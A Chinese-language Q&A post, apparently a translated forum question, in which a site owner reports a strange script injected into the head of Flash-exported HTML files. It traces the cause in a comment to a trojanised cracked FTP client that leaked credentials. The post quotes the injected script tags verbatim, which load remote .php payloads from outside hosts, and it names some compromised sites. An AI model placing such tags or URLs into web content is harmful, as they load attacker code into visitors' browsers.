【发布时间】:2013-11-05 21:56:52
【问题描述】:
一位朋友正在将 flash 文件上传到我的服务器,其中包含 Flash CS6 编辑器在其 export 命令中建议的所有 html 包。
好吧,尽管有这么多的 Flash 讨论,但问题是最终会在 head 元素中出现一个非常奇怪的脚本引用:
<!--339810--><script type="text/javascript">var gwloaded = false;</script>
<script src="http://techmounting.com.au/KsEsFOFC.php" type="text/javascript"></script><!--/339810-->
这个脚本引用不在原始html文件中..这闻起来是病毒,但我在整个google中都没有找到任何引用..我不知道是否是病毒在我朋友的电脑上或在我的服务器上等等。
有什么想法吗?
另一个例子(不在我的服务器中)
http://www.iu-jaen.es(不使用浏览器访问)
http://www.alliedcarehomehealth.com(不使用浏览器访问)
<script type="text/javascript">var gwloaded = false;</script>
<script src="http://shinhanvn.com.vn/Uploads/iOVAO5QT.php" type="text/javascript"></script>
【问题讨论】:
-
我认为我们检测到了攻击是如何进行的,我的朋友正在使用“破解”版本的 FTP Windows 客户端。看起来 crack 包含某种木马。 黑黑客从这个 ftp 用户那里获取了密码,他们正在修改他们有权访问的 html 文件。修复 html 文件不是解决方案,因为这些文件在几天内又被修改了。更改ftp客户端,ftp密码解决了问题。